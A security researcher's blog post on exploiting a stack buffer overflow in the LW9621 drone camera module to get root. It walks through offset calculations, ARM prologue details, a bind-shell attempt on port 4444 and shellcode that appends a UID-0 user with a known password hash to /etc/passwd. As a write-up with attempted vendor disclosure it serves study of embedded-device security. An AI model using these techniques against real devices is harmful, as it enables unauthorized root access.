Exploiting the LW9621 Drone Camera Module

16 min readJul 4, 2020

Using a typical stack buffer overflow to gain root access to a LW9621 drone camera module used in common recreational drones.

TL;DR

I got root shell access to the LW9621 camera module by exploiting the command port of the lewei_cam process. A stack buffer overflow allowed overwriting the return address to jump to shellcode that added a new user with UID 0 and a known password to /etc/passwd, which I could use to log in through telnet.
This type of exploit isn’t as prevalent in modern systems with more advanced defenses, but this serves as an example of the many embedded and IoT devices that are still vulnerable.

Background

While reverse-engineering the control server of a new drone I got, I came across several locations where the number of bytes to read from the network into a fix-sized buffer was determined from a user-controlled buffer. This allows an attacker to force the program to write data past the bounds of the buffer, which potentially allows remote code execution through a buffer-overflow exploit.

For a quick background on the device, the LW9621 is a wireless camera module used in common toy drones. It provides remote video streaming, recording, and control of the drone over WiFi, which it acts as the access point. From the reverse-engineering work linked above, I pulled various files from /proc (initially assuming it to be Linux), to get more information about the operating system:

/proc/version

/proc/cpuinfo

/proc/meminfo

From the /proc files above, I could tell the module runs Linux 3.4.35 on an ARMv5 little-endian processor and has about 36 MB of RAM (about 7MB free) for user-space processes. This let me know what kind of code I may need and that enough memory was available to run additional processes if needed.

On Linux, /proc/self is a symbolic link to the /proc/[PID] directory of the currently active process, so I can get information about the process to which I connect over port 7060. This is assuming that process is the one that calls open(2) and read(2); otherwise, I would get the information about a child process it forks to open and read the file. Downloading /proc/self/stat provided the following content:

/proc/self/stat

The fields are described in the /proc/[pid]/stat section of the proc(5) man page. Here, the process ID is 435 and the filename of the executable is lewei_cam. Knowing the PID, I could use /proc/435 to point to the same information instead of the /proc/self symlink. Downloading /proc/self/exe, which is a symbolic link to the executable path, provided the actual lewei_cam file from the file system. This is the file I previously downloaded and investigated in Ghidra.

First attempt

My first attempt at exploiting a stack buffer overflow did not quite work out because I couldn’t supply valid data to properly control the program’s execution flow. It was the first vulnerable area that I found, so I spent some time working on it before moving on to look for other vulnerabilities.

The function above executes in a thread to handle a client connecting to port 7060. I rewrote it from Ghidra’s decompilation and omitted some lines for clarity. This function contains two buffer overflow vulnerabilities: 1) at line 76 where network data is written to a stack buffer, and 2) at line 86 where network data is written to a heap buffer. Heap overflows are usually trickier to exploit, so I started with the stack buffer overflow.

At line 76, net_recv() is called to write size bytes into the stack_buf array. (The net_recv function wraps the recv(2) call in a loop because recv does not guarantee it will read all requested bytes in a single call.) The size variable gets set at line 46 when 46 bytes from heap_buf, which were read from the socket at line 43, gets written to the stack starting at the address pointed to by hdr.

Since size was set from data read off the network, it is controllable by a user. During normal operation, a proper client sets that value to 124, which is the size of the stack_buf array, but is never checked. If an attacker sends a header with the size field set to something larger than 124, and then sends that many bytes, the thread will attempt to write those bytes onto the stack from the socket, writing past the stack_buf array and into other variables.

One way to verify the overflow is to induce a crash by writing zeros on the stack to trigger a segmentation fault when the process attempts to deference a pointer. If I send a proper header with command #9 and enough follow-on bytes to overwrite the context pointer, the process should crash when it goes back to the top of the while loop and dereferences context in the do/while loop. Using the stack offset values from Ghidra, stack_buf is 308 bytes away from context, so sending 312 bytes will overwrite it. I can skip the block starting at line 77 by setting size to be larger than the number of bytes actually sent.

Running this Python snippet crashed the process because port 7060 closed immediately after the throw. Several the seconds later, it was listening again, so something must be restarting the process. I verified it was a new process by pulling /proc/self/stat again, which gave a new PID (585):

585 (lewei_cam) S 1 437 436 0 -1 4194560 390 0 0 0 8 13 0 0 20 0 6 0 119612 29175808 242 4294967295 32768 311536 3201117792 3201117240 3068265996 0 65536 65540 22018 4294967295 0 0 17 0 0 0 0 0 0 344304 345656 1257472

After more poking around, I found out anyka_print(), which is used for debugging output in various locations, calls the syslog(3) function, and downloaded /var/log/messages to see if it contained those logs. It did, and I verified it was a segfault (signal 11):

Jan  1 00:19:53 lewei user.debug syslog: [L:779]Client connected...IP:192.168.0.11, port:16106, fd:19.
Jan  1 00:19:53 lewei user.debug syslog: **************************
Jan  1 00:19:53 lewei user.debug syslog:  ##signal 11 caught
Jan  1 00:19:53 lewei user.debug syslog: **************************

The next step was to figure out a way to get arbitrary code execution. There are a few typical ways when using the stack. From the Buffer overflow page on Wikipedia:

A technically inclined user may exploit stack-based buffer overflows to manipulate the program to their advantage in one of several ways:
* By overwriting a local variable that is located near the vulnerable buffer on the stack, in order to change the behavior of the program
* By overwriting the return address in a stack frame. Once the function returns, execution will resume at the return address as specified by the attacker — usually a user-input filled buffer
* By overwriting a function pointer or exception handler, which is subsequently executed
* By overwriting a local variable (or pointer) of a different stack frame, which will be used by the function which owns that frame later.

My goal was to get a root shell on the camera, so merely changing the program behavior wasn’t enough as this function and others in the call stack didn’t provide any exec capabilities that I could trick it to run. Some function pointers were used, such as when starting a streaming thread (which would occur in the omitted code at line 79), but those were hard-coded addresses I could not overwrite. Those most likely method here was to overwrite the return address pointing to some shellcode.

Before the function got to any return address I set, it has to make it to the return at line 72, which includes successfully dereferencing context a few times and freeing some pointers. After searching around for a while, I wasn’t able to set context to a valid address where it could be dereferenced and freed (i.e., a valid heap address, and I couldn’t predict the value of the heap_buf pointer), so I decided to move on and look other similar vulnerabilities in other functions.

Second attempt (part 1)

My second attempt focused on a different function, lewei_cmd_execute(), that had a similar stack-buffer overflow vulnerability where I was able to control the flow enough to gain code execution. However, I had issues executing a shell connected to the socket. The following code shows the decompiled function with renamed variables and omitted code for clarity.

Just like the vulnerability in the first attempt, I could control the size variable, which was used to read more data from the socket onto the stack. The initial 48 bytes were read into buf by the calling function, which called this function, passing the socket, a pointer to the buffer, and the buffer length. That buffer is copied to the stack at line 23, probably into a struct data structure for ease of access to the internal fields (although the individual fields are just laid out in the decompiled code). Then after some checks and other setup, the function enters a switch block and jumps to the vulnerable code when the type is #4.

The command type #4 is used to set the system time from a 64-bit value that the user sends. Typically, size is 8, so the code would read the next 8 bytes into the time variable and call settime(), a custom function that sets the time by calling system("date \"YYYY-mm-dd HH:MM:SS\"").

Similar to the first attempt above, I wanted to prove I can overwrite the stack. Running the same Python snippet above, but to port 8060, did crash the process, which I verified by pulling /var/log/messages. The next step was to see if I could actually control the execution flow. Once the buffer overflow occurs, I can skip the settime() block at line 35 by sending one less byte than size, which breaks out of the switch block, calls free(heap_buf), sets the return value in a register, and returns to the calling function. Unlike with client_thread(), I can get to the return by making sure I overwrite the heap_buf pointer with zeros, which free() accepts. I should be able to overwrite the return address and jump to an arbitrary instruction in the program.

In order to calculate how far the location of the return address was from the time variable, I needed to understand the prologue and epilogue for the ARM calling convention, which for this function, looked like:

; prologue
stmdb   sp!, { r4, r11, lr }
add     r11,sp,#0x8
sub     sp,sp,#0x204; function code
...; epilogue
sub     sp,r11,#0x8
ldmia   sp!,{ r4 r11 pc }

In the prologue, lr (link register (r14), storing the return address), r11 (frame pointer), and r4 (unsure what used for) are pushed onto the stack in that order. The new frame pointer (r11) is set to point to where the saved lr is on the stack by adding 8 to the current stack pointer (sp), and 0x204 is added to the stack pointer to mark the top of this function’s stack, making room for all the local variables. In the epilogue, the stack pointer is reverted to the frame pointer subtracted by 8, and the three registers are restored from the stack (the saved lr restores into the program counter pc as the next instruction to execute, which is where the function “returns”).

Here’s what the layout of the stack should be after the prologue executes:

An example stack layout during the execution of lewei_cmd_execute() just after the function prologue, showing only the local variables used in the code snippet above. A few of the variables are not aligned at the four-byte boundary, so some shading shows the related half-words. (The addresses in the Address column were made up for this example.)

At line 34, the data for the buffer overflow is read from the socket and written to the stack, starting at the address of the time variable, which is r11-0xcc (or 0xb000ff24 in this example). To overwrite the saved lr value, 208 bytes are needed (0xb000fff0–0xb000ff24=204, plus 4 bytes to overwrite it).

To prove I could set the return address and jump anywhere, I thought about trying to jump to the anyka_print call at line 28. Calling that function makes references to the stack, so I couldn’t leave the saved r11 address as all zeros. I downloaded /proc/self/maps to get the valid address space for the program. There were several stacks in used because of the multiple running threads, so I just chose a random address in the middle of the main stack.

Example /proc/self/maps for lewei_cam (truncated some lines for space).

The main stack range was 0xbed69000 to 0xbed8a000, so I chose 0xbed80000 to use for r11. The maps file also shows the program address space starts at 0x00008000, which is the same base address specified in the program’s header, so address space layout randomization is not in use here. Looking at the disassembly in Ghidra, the start of the call at line 28 is at 0x0001591c.

Disassembly for the anyka_print() call at line 28.

Running a small piece of Python with those addresses to test:

And downloading /var/log/messages again:

Jan  1 00:52:43 lewei user.debug syslog: [lewei_net do_accept_client]:Client connected...IP:192.168.0.11, port:56060, fd:20.
Jan  1 00:52:43 lewei user.debug syslog: TYPE 4, DATA LEN 209
Jan  1 00:52:43 lewei user.debug syslog: TYPE 0, DATA LEN 0
Jan  1 00:52:43 lewei user.debug syslog: **************************
Jan  1 00:52:43 lewei user.debug syslog:  ##signal 11 caught
Jan  1 00:52:43 lewei user.debug syslog: **************************

The process still crashed, but there’s an additional line that prints the type and data length again, which was due to the new return address. The printed values were 0 by chance; the memory location I set for the frame pointer must have been mostly zeros. This verifies I can properly set the return address.

Second attempt (Part 2)

I can fully control the execution path of the program, but now I needed to figure out how to execute my own code. The classic, and probably easiest, way is to include shellcode in the data for the buffer overflow and set the return address to the stack location where that shellcode begins. Common defenses against that method include stack canaries and non-executable stacks. Luckily, none of those are used here. I noticed the main stack in /proc/self/maps did not have the execute permission, however, all the other stacks created by pthreads did allow for execution. I knew the lewei_cmd_execute function was executing in a thread by tracing through Ghidra’s decompilation, so that would not be a blocker here.

If I wanted to execute my shellcode from the stack, I needed to figure out which thread’s stack lewei_cmd_execute used. There were 14 stacks to check, which is low enough that I could manually try each one. The stack addresses change for each lewei_cam execution, but I can get the latest addresses from the process’s maps file. Here’s a list of stack ranges from one download:

The method I used to verify the stack was to write a lot of junk data in the buffer overflow, then jump to the same anyka_print call as above, which would print my junk data as the “TYPE” and “DATA LEN” values if I chose the correct stack address. I was curious how far down the stack this function was, so by setting the junk data to increasing 2-byte values, I could get the exact offset from the time variable. This took a bit of time because I had to download the new maps file each time the processes crashed and adjust my guesses of how much junk data to send (too few and the print would not show my junk, too much and it would overwrite the next thread’s stack, possibly crashing the process before my jump).

Running the above Python code many times, changing the stack’s high address in fp after each crash, and changing other variables like the stack offset and how much junk to send, I finally got some useful output:

Jan  1 02:23:09 lewei user.debug syslog: [lewei_net do_accept_client]:Client connected...IP:192.168.0.11, port:16323, fd:20.
Jan  1 02:23:09 lewei user.debug syslog: TYPE 4, DATA LEN 8399
Jan  1 02:23:09 lewei user.debug syslog: TYPE 18809118, DATA LEN 19202340
Jan  1 02:23:09 lewei user.debug syslog: **************************
Jan  1 02:23:09 lewei user.debug syslog:  ##signal 11 caught
Jan  1 02:23:09 lewei user.debug syslog: **************************

Here, the “TYPE” was 18809118, and “DATA LEN” was 19202340, or 0x011f011e and 0x01250124 in hex, respectively. Because the system is little-endian, the bytes at the memory location where type starts was 1e 01 1f 01. This hit consistently on the 8th stack from the bottom of the maps file, and the printed junk data were always the same values. That means the type variable in this “shifted” call stack was 286 (0x011e) half-words away from the beginning of the “junk” data, which was the byte after the return address in the “original” call stack.

Now that I found the correct stack and had how far down the stack it got, I could calculate the exact offset of the time variable from the base of the thread’s stack. To help visualize the calculation, here was what the “shifted” call stack looked like (i.e. after it returned to the custom location and I overrode the saved r11 to be 0xb4560000–0x1000=0xb455f000):

Forced call stack (by overwriting the saved r11 frame pointer) when forcing the return to the anyka_print() call, and their values, which were set by the incrementing 2-byte values from the buffer overflow.

The new frame pointer, which was 0x174 half-words from the beginning of the “junk” data, was 0x1000 bytes from the stack’s high address. Since the beginning of the “junk” data was 208 bytes from the time variable, that makes the beginning of the attack buffer 0x1000+(0x174*2)+208=0x13b8 bytes from the stack’s high address.

The next step was to finally prove I could execute my own shellcode. One common trick is to use shellcode that implements an infinite busy loop. If the connection or process hangs, or the CPU’s load spikes, then the execution flow hit the infinite loop. For ARM, the instruction is 0xeafffffe, which just jumps back four bytes to keep executing the same instruction:

$ cat loop.s
.global _start
_start: b _start
$ arm-linux-gnu-as -o loop.o loop.s
$ arm-linux-gnu-ld -N -o loop loop.o
$ arm-linux-gnu-objcopy -O binary loop loop.bin
$ xxd -p loop.bin
feffffea

To execute my shellcode, the attack buffer should be 204 bytes, the 4-byte return address, and then the beginning of the shellcode. With this layout, the address of the shellcode will be the stack’s high address, subtracted by 0x13b8 (to get to the beginning of the buffer), plus 208 (to point to just after the return address). I decided to start my shellcode after the return address for simplicity, but could put it somewhere in the first 204 bytes and calculate the address just as easily.

Running some Python to test out my calculations:

Exploit to execute infinite busy loop shellcode.

Downloading the /proc/self/stat file shows the process has the same PID, so it didn’t crash. Pulling /proc/loadavg after a minute showed an increase in the first value, proving the shellcode executed. (The normal 1-minute load average was around 0.20.)

$ cat downloads/proc/loadavg
0.72 0.39 0.23 2/59 601

Second attempt (part 3)

Now that I got remote code execution, the next step was to execute some shellcode that would provide some kind of shell access. I went over to exploit-db.com to search for some Linux/ARM shellcode I could use. The buffer wasn’t being treated as a C string, so I had more flexibility in the content of the shellcode and didn’t have to worry about NULL bytes. I also had a lot of memory space to use (over 4kB). I settled on shellcode that would bind on TCP port 4444 and execute /bin/sh once getting a connection, attaching stdin/stdout/stderr to the socket. Adding that shellcode using the same Python code above, and replacing the current stack’s high address:

Exploit script with shellcode to listen on TCP port 4444 and execute /bin/sh once it gets a connection.

After running that script, I tried to netcat to the port it should be listening on:

$ nc -v 192.168.0.1 4444
Connection to 192.168.0.1 4444 port [tcp/*] succeeded!

And it worked! However, after about a second, the connection dropped. I never got the /bin/sh prompt and couldn’t run a command before it dropped.

I tried various things like modifying the shellcode to fork then execute /bin/sh, not switching to Thumb mode, closing other file descriptors, trying execve(2) with an argv array, all with varying degrees of failure. The fork() seemed to hang. Closing other file descriptors caused the process to die and restart.

Downloading /var/log/messages again, I noticed some logging lines that weren’t from lewei_cam:

Sample from /var/log/messages after a failed /bin/sh execution.

The “MainApp was dead” and “call:” lines were from the /usr/bin/daemon program, which I found by grepping through the binaries I extracted from the full squashfs filesystem by downloading /dev/root. Looking through that binary in Ghidra, I found a function that watches /tmp/daemon_fifo, to which lewei_cam writes, and if it doesn’t receive an expected string through it every three seconds, it calls /usr/sbin/lewei_cam.sh to kill the process and start it again. I don’t think that restart was causing /bin/sh to fail, but I couldn’t prove that it wasn’t yet.

Third (and final) attempt

With the ability to run arbitrary shellcode of a decent size (over 4kB to work with), I just needed to figure out the right technique to finally gain shell access.

While searching through the Linux/ARM shellcode entries on exploit-db.com, I came across one that would add a new user: Add Root User (shell-storm/toor) To /etc/passwd Shellcode. I remembered that the camera had telnet open on port 23, was previously unsuccessful at cracking root’s password hash from the /etc/shadow download. I wasn’t sure if /etc/passwd would be writable, but looking again at the extracted squashfs file system, I saw /etc/passwd and /etc/shadow were symlinks to /etc/jffs2/passwd and /etc/jffs2/shadow. Downloading the /proc/mounts file, which shows the mounted partitions, I saw that directory was writable:

$ grep "jffs2" ./downloads/proc/mounts
/dev/mtdblock2 /etc/jffs2 jffs2 rw,relatime 0 0

So I might be able to add a new user to /etc/passwd with a UID of 0 and a known password. The shellcode would append the following line:

shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash

After replacing the TCP bind shellcode in the Python script above with the “shell-storm” one (I needed to add a NULL byte at the end because the shellcode isn’t being interpreted as a string) and getting the new stack address, I ran the script and tried to log in:

Exploit throw to add a root user. Login failed due to no /bin/bash.

Almost! Apparently the camera didn’t have /bin/bash to execute, so it immediately disconnected. I modified the shellcode so the user’s shell was just /bin/sh (I replaced the additional characters with new lines so the length would be the same), and slightly modified the username to shell-storn so there wouldn’t be a conflict:

Script with the shellcode to successfully add a root user.

Throwing the exploit and trying to log in again:

Second exploit throw to add a root user, setting the user’s shell to /bin/sh, which worked.

Success! I finally had an unrestricted root shell on the camera. For easy access, I replaced root’s password hash with one of my own in /etc/shadow and removed the new shell-storm user.

I wasn’t sure what else I wanted to do with the camera at this point, but it was a fun ride.

Additional notes

I did email the company that makes the LW9621 camera module about the vulnerabilities I found, but never got a response.
I figure the risk of making this public is somewhat low because the camera module is just used in low-cost recreational drones. An attacker would need to successfully connect to the module’s WiFi access point, and the owner can enable WPA-PSK using pylwdrone.
After gaining root access, I spent additional some time trying to figure out why executing /bin/sh or forking wasn’t working in the shellcode, but couldn’t yet. I attempted to run a statically-compiled strace to attach to the process while exploiting it, but couldn’t find or build one that worked with this device.